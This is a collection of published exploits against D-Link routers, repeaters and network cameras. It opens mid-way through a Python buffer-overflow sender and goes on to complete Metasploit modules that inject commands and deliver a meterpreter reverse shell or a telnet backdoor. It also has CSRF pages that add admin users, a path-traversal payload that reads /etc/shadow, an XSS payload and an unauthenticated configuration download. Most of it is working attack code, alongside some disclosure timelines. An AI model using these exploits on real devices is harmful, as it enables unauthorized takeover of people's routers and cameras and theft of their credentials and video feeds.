buf+="GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ\r\n\r\n"+"test=test\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
s.send(buf)
data = s.recv(BUFFER_SIZE)
s.close()
print "received data:", data
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Udp
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi',
'Description' => %q{
D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.
},
'Author' =>
[
's1kr10s',
'secenv'
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-20215'],
['URL', 'https://medium.com/@s1kr10s/2e799acb8a73']
],
'DisclosureDate' => 'Dec 24 2019',
'Privileged' => true,
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'DefaultOptions' =>
{
'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',
'CMDSTAGER::FLAVOR' => 'wget',
'RPORT' => '1900'
},
'Targets' =>
[
[ 'Auto', { } ],
],
'CmdStagerFlavor' => %w{ echo wget },
'DefaultTarget' => 0
))
register_options(
[
Msf::OptEnum.new('VECTOR',[true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']])
])
end
def exploit
execute_cmdstager(linemax: 1500)
end
def execute_command(cmd, opts)
type = datastore['VECTOR']
if type == "URN"
print_status("Target Payload URN")
val = "urn:device:1;`#{cmd}`"
else
print_status("Target Payload UUID")
val = "uuid:`#{cmd}`"
end
connect_udp
header = "M-SEARCH * HTTP/1.1\r\n"
header << "Host:239.255.255.250: " + datastore['RPORT'].to_s + "\r\n"
header << "ST:#{val}\r\n"
header << "Man:\"ssdp:discover\"\r\n"
header << "MX:2\r\n\r\n"
udp_sock.put(header)
disconnect_udp
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link Devices HNAP SOAPAction-Header Command Execution',
'Description' => %q{
Different D-Link Routers are vulnerable to OS command injection in the HNAP SOAP
interface. Since it is a blind OS command injection vulnerability, there is no
output for the executed command. This module has been tested on a DIR-645 device.
The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB,
DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB,
DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR
},
'Author' =>
[
'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645
'Craig Heffner', # independent Vulnerability discovery on different other routers
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051'],
['URL', 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/']
],
'DisclosureDate' => 'Feb 13 2015',
'Privileged' => true,
'Platform' => 'linux',
'Targets' =>
[
[ 'MIPS Little Endian',
{
'Arch' => ARCH_MIPSLE
}
],
[ 'MIPS Big Endian', # unknown if there are BE devices out there ... but in case we have a target
{
'Arch' => ARCH_MIPSBE
}
]
],
'DefaultTarget' => 0
))
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOUR')
end
def check
uri = '/HNAP1/'
soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings'
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'headers' => {
'SOAPAction' => soap_action,
}
})
if res && [200].include?(res.code) && res.body =~ /D-Link/
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Trying to access the device ...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
end
print_status("#{peer} - Exploiting...")
execute_cmdstager(
:flavour => :echo,
:linemax => 200,
:temp => ''
)
end
def execute_command(cmd, opts)
uri = '/HNAP1/'
# we can not use / in our command so we need to use a little trick
cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd
soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`"
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'headers' => {
'SOAPAction' => soap_action,
}
}, 3)
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link Cookie Command Execution',
'Description' => %q{
This module exploits an anonymous remote upload and code execution vulnerability on different
D-Link devices. The vulnerability is a command injection in the cookie handling process of the
lighttpd web server when handling specially crafted cookie values. This module has been
successfully tested on D-Link DSP-W110A1_FW105B01 in emulated environment.
},
'Author' =>
[
'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # vulnerability discovery and initial PoC
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'References' =>
[
['URL', 'https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110'] # blog post including PoC
],
'DisclosureDate' => 'Jun 12 2015',
'Payload' =>
{
'DisableNops' => true
},
'Targets' =>
[
[ 'MIPS Little Endian', # unknown if there are LE devices out there ... but in case we have a target
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE
}
],
[ 'MIPS Big Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE
}
]
],
'DefaultTarget' => 1
))
end
def check
begin
res = send_request_cgi({
'uri' => '/',
'method' => 'GET'
})
if res && res.headers["Server"] =~ /lighttpd\/1\.4\.34/
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Trying to access the device ...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
end
print_status("#{peer} - Uploading stager ...")
@counter = 1
execute_cmdstager(
:flavor => :echo,
:linemax => 95 # limited by our upload, larger payloads crash the web server
)
print_status("#{peer} - creating payload and executing it ...")
(1 .. @counter).each do |act_file|
# the http server blocks access to our files ... we copy it to a new one
# the length of our command is restricted to 19 characters
cmd = "cp /t*/#{act_file} /tmp/#{act_file+@counter}"
execute_final_command(cmd)
cmd = "chmod +x /tmp/#{act_file+@counter}"
execute_final_command(cmd)
cmd = "/tmp/#{act_file+@counter}"
execute_final_command(cmd)
cmd = "rm /tmp/#{act_file}"
execute_final_command(cmd)
cmd = "rm /tmp/#{act_file+@counter}"
execute_final_command(cmd)
end
end
def execute_command(cmd,opts)
# upload our stager to a shell script
# upload takes quite long because there is no response from the web server
file_upload = "#!/bin/sh\n"
file_upload << cmd << "\n"
post_data = Rex::MIME::Message.new
post_data.add_part(file_upload, nil, "binary", "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{@counter}\"")
post_data.bound = "-#{rand_text_alpha(12)}--"
file = post_data.to_s
@counter = @counter + 1
begin
send_request_cgi({
'method' => 'POST',
'uri' => "/web_cgi.cgi",
'vars_get' => {
'&request' =>'UploadFile',
'path' => '/tmp/'
},
'encode_params' => false,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => file
})
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
def execute_final_command(cmd)
# very limited space - larger commands crash the webserver
fail_with(Failure::Unknown, "#{peer} - Generated command for injection is too long") if cmd.length > 18
begin
send_request_cgi({
'method' => 'GET',
'uri' => "/",
'cookie' => "i=`#{cmd}`"
}, 5)
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end
# Exploit Title: [D-Link DCS-936L network camera incomplete/weak CSRF protection vulnerability]
# Date: [26/03/2017]
# Exploit Author: [SlidingWindow] , Twitter: @Kapil_Khot
# Vendor Homepage: [http://us.dlink.com/product-category/home-solutions/view/network-cameras/]
# Version: [Tested on DCS-936L with firmware version 1.03. Other versions/models are also be affected]
# Tested on: [DCS-936L with firmware version 1.02.01]
# CVE : [CVE-2017-7851]
==================
#Product:-
==================
Small and unobtrusive, SecuriCam™ IP surveillance solutions from D-Link allow you to monitor your offices or warehouses from anywhere - at anytime. Extreme Low LUX optics, 2 way audio, and full pan/tilt/zoom manipulation provide everything an SMB needs to safeguard their valuable resources.
==================
#Vulnerability:-
==================
D-Link DCS-936L network camera incomplete/weak CSRF protection vulnerability.
========================
#Vulnerability Details:-
========================
=============================================================================================================================
D-Link DCS-936L network camera incomplete/weak CSRF protection vulnerability (CVE-2017-7851)
=============================================================================================================================
D-Link DCS-936L devices with firmware 1.02.01 have CSRF. If a victim is logged into the camera's web console and visits a malicious site hosting a <Target_Device_IP.HTML> from another tab in the same browser, the malicious site can send requests to the victim's device. An attacker can add a new user, replace the firmware image with a malicious one, or connect the victim's device to a rogue Wireless Network.
An attacker can easily find out public IP address of victim's device on Shodan or similar search engines to create <Target_Device_IP.HTML> file. Victim must be logged into the camera's web console and visit attacker's site from another tab in the same browser.
#Proof-of-Concept:-
-------------------
D-Link DCS-936L prevents CSRF attack by looking at ‘Referer’ header. The ‘Referer’ IP should match with the one in ‘HOST’ header. If it does not, HTTP 403 is returned in the response. However, this device does not perform a strict check on ‘Referer’ header. It seems that it looks for the device’s IP address (which is the one in ‘HOST’ header) anywhere in the ‘Referer’ header. If found, it happily accepts the request.
An unauthenticated, remote attacker could host a malicious site that makes requests to the victim’s device without having credentials. In a targeted attack, an attacker needs to trick victim to visit a malicious site that exploits this vulnerability.
1. Attacker hosts a ‘<target_ip>.html’ on <attacking_ip>
<html>
<body>
<form id="CSRF" action="http://<target_ip>/eng/admin/tools_admin.cgi" method="POST">
<input type="hidden" name="user" value="hacker">
<input type="hidden" name="action" value="set">
<input type="hidden" name="password" value="abc123">
<input type="hidden" name="confirmPassword" value="abc123">
</form>
<script>
window.onload = function(){
document.forms['CSRF'].submit()
}
</script>
</body>
</html>
2. Victim logs into his device.
3. Victim then visits attackers site http://<attacking_ip>/<target_ip>.html
4. Above request adds a new user ‘Hacker’ which reboots the web server.
6. Browser sends add new user request to the target device <target_ip>. Victim's browser sets 'Referer' header to 'http://<attacking_ip>/<target_ip>.html'. As this contains the IP address of the device (<target_ip>), this request is processed successfully.
7. Server response shows user hacker added successfully:
8. Attacker can now log into the device as hacker/abc123
===================================
#Vulnerability Disclosure Timeline:
===================================
26/03/2017: First email to disclose vulnerability to D-Link incident response team.
26/03/2017: Vendor acknowledged the report.
25/05/2017: Vendor confirmed that development has been completed and it's undergoing security audit.
13/10/2017: Firmwared released to production: ftp://ftp2.dlink.com/PRODUCTS/DCS-936L/REVA/DCS-936L_REVA_FIRMWARE_v1.05.07.zip
13/11/2017: DCS-936L Firmware Release Notes: ftp://ftp2.dlink.com/PRODUCTS/DCS-936L/REVA/DCS-936L_REVA_RELEASE_NOTES_v1.05.07.pdf
15/11/2017: Published CVE-2017-7851
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
HttpFingerprint = { :pattern => [ /alphapd/ ] }
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link DCS-931L File Upload',
'Description' => %q{
This module exploits a file upload vulnerability in D-Link DCS-931L
network cameras. The setFileUpload functionality allows authenticated
users to upload files to anywhere on the file system, allowing system
files to be overwritten, resulting in execution of arbitrary commands.
This module has been tested successfully on a D-Link DCS-931L with
firmware versions 1.01_B7 (2013-04-19) and 1.04_B1 (2014-04-21).
D-Link DCS-930L, DCS-932L, DCS-933L models are also reportedly
affected, but untested.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mike Baucom', 'Allen Harper', 'J. Rach', # Initial discovery by Tangible Security
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
],
'Payload' =>
{
'Space' => 1024, # File upload
'DisableNops' => true
},
'Platform' => 'linux',
'Privileged' => false,
'Targets' =>
[
[ 'Linux mipsle Payload',
{
'Arch' => ARCH_MIPSLE,
'Platform' => 'linux'
}
]
],
'DefaultTarget' => 0,
'References' =>
[
[ 'CVE', '2015-2049' ],
[ 'URL', 'https://tangiblesecurity.com/index.php/announcements/tangible-security-researchers-notified-and-assisted-d-link-with-fixing-critical-device-vulnerabilities' ],
[ 'URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10049' ] # Vendor advisory
],
'DisclosureDate' => 'Feb 23 2015'))
register_options(
[
OptString.new('USERNAME', [true, 'Camera username', 'admin']),
OptString.new('PASSWORD', [false, 'Camera password (default: blank)', ''])
], self.class)
end
def check
res = send_request_cgi(
'uri' => normalize_uri('uploadfile.htm'),
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']
))
unless res
vprint_status("#{peer} - The connection timed out.")
return Exploit::CheckCode::Unknown
end
if res.code && res.code == 404
vprint_status("#{peer} - uploadfile.htm does not exist")
return Exploit::CheckCode::Safe
elsif res.code && res.code == 401 && res.headers['WWW-Authenticate'] =~ /realm="DCS\-931L"/
vprint_error("#{peer} - Authentication failed")
return Exploit::CheckCode::Detected
elsif res.code && res.code == 200 && res.body && res.body =~ /Upload File/
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def exploit
payload_path = "/tmp/.#{rand_text_alphanumeric(rand(8) + 5)}"
# upload payload
res = upload(payload_path, generate_payload_exe)
unless res
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
if res.code && res.code == 404
fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist")
elsif res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/
print_good("#{peer} - Payload uploaded successfully")
else
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload payload")
end
register_file_for_cleanup(payload_path)
# overwrite /sbin/chpasswd.sh with stub
res = upload('/sbin/chpasswd.sh', "#!/bin/sh\n#{payload_path}&\n")
unless res
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
if res.code && res.code == 404
fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist")
elsif res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/
print_good("#{peer} - Stager uploaded successfully")
else
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload stager")
end
# execute payload using stub
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri('setSystemAdmin'),
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'vars_post' => Hash[{
'ReplySuccessPage' => 'advanced.htm',
'ReplyErrorPage' => 'errradv.htm',
'ConfigSystemAdmin' => 'Apply'
}.to_a.shuffle])
unless res
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
if res.code && res.code == 401
fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
elsif res.code && res.code == 200 && res.body
print_good("#{peer} - Payload executed successfully")
else
fail_with(Failure::UnexpectedReply, "#{peer} - Payload execution failed")
end
end
#
# Replace chpasswd.sh with original contents
#
def cleanup
chpasswd = <<-EOF
#!/bin/sh
#
# $Id: chpasswd.sh, v1.00 2009-11-05 andy
#
# usage: chpasswd.sh <user name> [<password>]
#
if [ "$1" == "" ]; then
echo "chpasswd: no user name"
exit 1
fi
echo "$1:$2" > /tmp/tmpchpw
chpasswd < /tmp/tmpchpw
rm -f /tmp/tmpchpw
EOF
res = upload('/sbin/chpasswd.sh', chpasswd)
if res && res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/
vprint_good("#{peer} - Restored /sbin/chpasswd.sh successfully")
else
vprint_warning("#{peer} - Could not restore /sbin/chpasswd.sh to default")
end
end
#
# Upload a file to a specified path
#
def upload(path, data)
vprint_status("#{peer} - Writing #{data.length} bytes to #{path}")
boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(10) + 5)}"
post_data = "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"ReplySuccessPage\"\r\n"
post_data << "\r\nreplyuf.htm\r\n"
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"ReplyErrorPage\"\r\n"
post_data << "\r\nreplyuf.htm\r\n"
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"Filename\"\r\n"
post_data << "\r\n#{path}\r\n"
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"UploadFile\"; filename=\"#{rand_text_alphanumeric(rand(8) + 5)}\"\r\n"
post_data << "Content-Type: application/octet-stream\r\n"
post_data << "\r\n#{data}\r\n"
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"ConfigUploadFile\"\r\n"
post_data << "\r\nUpload File\r\n"
post_data << "--#{boundary}\r\n"
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri('setFileUpload'),
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => post_data)
end
end
##
## This module requires Metasploit: http://metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Telnet
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link DCS-930L Authenticated Remote Command Execution',
'Description' => %q{
The D-Link DCS-930L Network Video Camera is vulnerable
to OS Command Injection via the web interface. The vulnerability
exists at /setSystemCommand, which is accessible with credentials.
This vulnerability was present in firmware version 2.01 and fixed
by 2.12.
},
'Author' =>
[
'Nicholas Starke <nick@alephvoid.com>'
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'Dec 20 2015',
'Privileged' => true,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find',
},
},
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
OptString.new('PASSWORD', [ false, 'Password to login with', ''])
], self.class)
register_advanced_options(
[
OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet Command', 10]),
OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25])
], self.class)
end
def telnet_timeout
(datastore['TelnetTimeout'] || 10)
end
def banner_timeout
(datastore['TelnetBannerTimeout'] || 25)
end
def exploit
user = datastore['USERNAME']
pass = datastore['PASSWORD'] || ''
test_login(user, pass)
exploit_telnet
end
def test_login(user, pass)
print_status("#{peer} - Trying to login with #{user} : #{pass}")
res = send_request_cgi({
'uri' => '/',
'method' => 'GET',
'authorization' => basic_auth(user, pass)
})
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - invalid credentials (response code: #{res.code}") if res.code != 200
print_good("#{peer} - Successful login #{user} : #{pass}")
end
def exploit_telnet
telnet_port = rand(32767) + 32768
print_status("#{peer} - Telnet Port: #{telnet_port}")
cmd = "telnetd -p #{telnet_port} -l/bin/sh"
telnet_request(cmd)
print_status("#{rhost}:#{telnet_port} - Trying to establish telnet connection...")
ctx = { 'Msf' => framework, 'MsfExploit' => self }
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => telnet_timeout })
if sock.nil?
fail_with(Failure::Unreachable, "#{rhost}:#{telnet_port} - Backdoor service unreachable")
end
add_socket(sock)
print_status("#{rhost}:#{telnet_port} - Trying to establish a telnet session...")
prompt = negotiate_telnet(sock)
if prompt.nil?
sock.close
fail_with(Failure::Unknown, "#{rhost}:#{telnet_port} - Unable to establish a telnet session")
else
print_good("#{rhost}:#{telnet_port} - Telnet session successfully established")
end
handler(sock)
end
def telnet_request(cmd)
uri = '/setSystemCommand'
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'POST',
'vars_post' => {
'ReplySuccessPage' => 'docmd.htm',
'ReplyErrorPage' => 'docmd.htm',
'SystemCommand' => cmd,
'ConfigSystemCommand' => 'Save'
}
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
def negotiate_telnet(sock)
begin
Timeout.timeout(banner_timeout) do
while(true)
data = sock.get_once(-1, telnet_timeout)
return nil if not data or data.length == 0
if data =~ /BusyBox/
return true
end
end
end
rescue ::Timeout::Error
return nil
end
end
end
# Exploit Title: [Insecure CrossDomain.XML in D-Link DCS Series Cameras]
# Date: [22/02/2017]
# Exploit Author: [SlidingWindow] , Twitter: @Kapil_Khot
# Vendor Homepage: [http://us.dlink.com/product-category/home-solutions/view/network-cameras/]
# Version: [Tested on DCS-933L with firmware version 1.03. Other versions/models are also be affected]
# Tested on: [DCS-933L with firmware version 1.03]
# CVE : [CVE-2017-7852]
==================
#Product:-
==================
Small and unobtrusive, SecuriCamô IP surveillance solutions from D-Link allow you to monitor your offices or warehouses from anywhere - at anytime. Extreme Low LUX optics, 2 way audio, and full pan/tilt/zoom manipulation provide everything an SMB needs to safeguard their valuable resources.
==================
#Vulnerability:-
==================
D-Link DCS series network cameras implement a weak CrossDomain.XML.
========================
#Vulnerability Details:-
========================
=============================================================================================================================
Insecure CrossDomain.XML in D-Link DCS Series Cameras (CVE-2017-7852)
=============================================================================================================================
D-Link DCS cameras have a weak/insecure CrossDomain.XML file that allows sites hosting malicious Flash objects to access and/or change the device's settings via a CSRF attack. This is because of the 'allow-access-from domain' child element set to *, thus accepting requests from any domain. If a victim logged into the camera's web console visits a malicious site hosting a malicious Flash file from another Browser tab, the malicious Flash file then can send requests to the victim's DCS series Camera without knowing the credentials. An attacker can host a malicious Flash file that can retrieve Live Feeds or information from the victim's DCS series Camera, add new admin users, or make other changes to the device. Known affected devices are DCS-933L with firmware before 1.13.05, DCS-5030L, DCS-5020L, DCS-2530L, DCS-2630L, DCS-930L, DCS-932L, and DCS-932LB1.
Vendor Response:-
----------------
In 2016 we phased in CSRF mitigation on all CGI on the cameras so an injection like this would not be allowed authenticated or unauthenticated. Please refer to the tracking table below which includes the H/W Revision and firmware when this CSRF mitigation was enabled.
DCS-2132L H/W ver:B F/W ver:2.12.00, DCS-2330L H/W ver:A F/W ver:1.13.00, DCS-2310L H/W ver:B, F/W ver:2.03.00, DCS-5029L H/W ver:A F/W ver:1.12.00,DCS-5222L H/W ver:B F/W ver:2.12.00, DCS-6212L H/W ver:A F/W ver:1.00.12, DCS-7000L H/W ver:A F/W ver:1.04.00, DCS-2132L H/W ver:A F/W ver:1.08.01, DCS-2136L H/W ver:A F/W ver:1.04.01, DCS-2210L H/W ver:A F/W ver:1.03.01, DCS-2230L H/W ver:A F/W ver:1.03.01, DCS-2310L H/W ver:A F/W ver:1.08.01, DCS-2332L H/W ver:A F/W ver:1.08.01, DCS-6010L H/W ver:A F/W ver:1.15.01, DCS-7010L H/W ver:A F/W ver:1.08.01, DCS-2530L H/W ver:A F/W ver:1.00.21, DCS-930L H/W ver:A F/W ver:1.15.04,DCS-930L H/W ver:B F/W ver:2.13.15, DCS-932L H/W ver:A F/W ver:1.13.04, DCS-932L H/W ver:B F/W ver:2.13.15, DCS-934L H/W ver:A F/W ver:1.04.15, DCS-942L H/W ver:A F/W ver:1.27, DCS-942L H/W ver:B F/W ver:2.11.03, DCS-931L H/W ver:A F/W ver:1.13.05, DCS-933L H/W ver:A F/W ver:1.13.05, DCS-5009L H/W ver:A F/W ver:1.07.05, DCS-5010L H/W ver:A F/W ver:1.13.05, DCS-5020L H/W ver:A F/W ver:1.13.05, DCS-5000L H/W ver:A F/W ver:1.02.02, DCS-5025L H/W ver:A F/W ver:1.02.10, DCS-5030L H/W ver:A F/W ver:1.01.06
#Proof-of-Concept:-
-------------------
1. Build a Flash file 'FlashMe.swf' using Flex SDK which would access Advance.htm from target device and send the response to attackerís site.
2. Upload 'FlashMe.swf' to the webroot of attacking machine.
3. Log into the Cameraís web console.
4. From another tab in the same browser visit http://attackingsiteip.com/FlashMe.swf
5. Flash object from Request#4 sends a GET request to http://CameraIP/advanced.htm
6. Flash object receives response from Camera and forwards it to http://attackingsiteip.com/
7. Sensitive information like Live Feed, WiFi password etc can be retrieved or new admin users can be added.
===================================
#Vulnerability Disclosure Timeline:
===================================
22/02/2017: First email to disclose the vulnerability to the D-Link incident response team
17/03/2017: Vendor responded stating that this attack would not work due to recently added CSRF mitigation.Shipped two different models running latest firmware for testing.
26/03/2017: Confirmed the fix after testing latest firmware. The 'Referer' header based CSRF protection mitigates this attack which cannot be bypassed unless there is a browser vulnerability.
24/04/2017: Published CVE-2017-7852
source: https://www.securityfocus.com/bid/52134/info
The D-Link DCS-900, DCS-2000, and DCS-5300 are prone to a cross-site request-forgery vulnerability.
Successful exploits may allow attackers to run privileged commands on the affected device, change configuration, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible.
This issue affects D-Link DCS-900, DCS-2000, and DCS-5300.
<html>
<body onload="javascript:document.forms[0].submit()">
<form method="POST" name="form0" action="http://www.example.com/setup/security.cgi">
<input type="hidden" name="rootpass" value="your_pass"/>
<input type="hidden" name="confirm" value="your_pass"/>
</form>
</body>
</html>
# Exploit Title: D-Link DAP-1360 File path traversal and Cross site
scripting[reflected] can lead to Authentication Bypass easily.
# Date: 20-07-2018
# Exploit Author: r3m0t3nu11
# Contact : http://twitter.com/r3m0t3nu11
# Vendor : www.dlink.com
# Version: Hardware version: F1
Firmware version: 6.O5
# Tested on:All Platforms
1) Description
After Successfully Connected to D-Link DIR-600
Router(FirmWare Version : 2.01), Any User Can Bypass The Router's
Root password as well bypass admin panel.
D-Link DAP-1360 devices with v6.x firmware allow remote attackers to
read passwords via a errorpage paramater which lead to absolute path
traversal attack,
Its More Dangerous when your Router has a public IP with remote login
enabled.
IN MY CASE,
Tested Router IP : http://192.168.70.69/
Video POC : https://www.dropbox.com/s/tvpq2jm3jv48j3c/D-link.mov?dl=0
2) Proof of Concept
Step 1: Go to
Router Login Page : http://192.168.70.69:80
Step 2:
Add the payload to URL.
Payload:
getpage=html%2Findex.html&errorpage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=dd&%3Aaction=login&%3Asessionid=3a6a085
Now u can get root password by reading /etc/shadow.
2- XSS
Step 1: Go to
Router Login Page : http://192.168.70.69:80
Step 2:
Add the payload to URL.
Payload:
getpage=html%2Findex.html&errorpage=<Script>alert('r3m0t3nu11')</script>&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=dd&%3Aaction=login&%3Asessionid=3a6a085
u will get r3m0t3nu11 name pop up as reflected xss
Greetz to : Samir Hadji,0n3,C0ld Z3r0,alm3refh group,0x30 team,zero way team.
# Exploit Title: D-Link DAP-1325 - Broken Access Control
# Date: 27-06-2023
# Exploit Author: ieduardogoncalves
# Contact : twitter.com/0x00dia
# Vendor : www.dlink.com
# Version: Hardware version: A1
# Firmware version: 1.01
# Tested on:All Platforms
1) Description
Security vulnerability known as "Unauthenticated access to settings" or "Unauthenticated configuration download". This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication.
IN MY CASE,
Tested repeater IP: http://192.168.0.21/
Video POC : https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=0
2) Proof of Concept
Step 1: Go to
Repeater Login Page : http://192.168.0.21/
Step 2:
Add the payload to URL.
Payload:
http://{ip}/cgi-bin/ExportSettings.sh
Payload:
https://github.com/eeduardogoncalves/exploit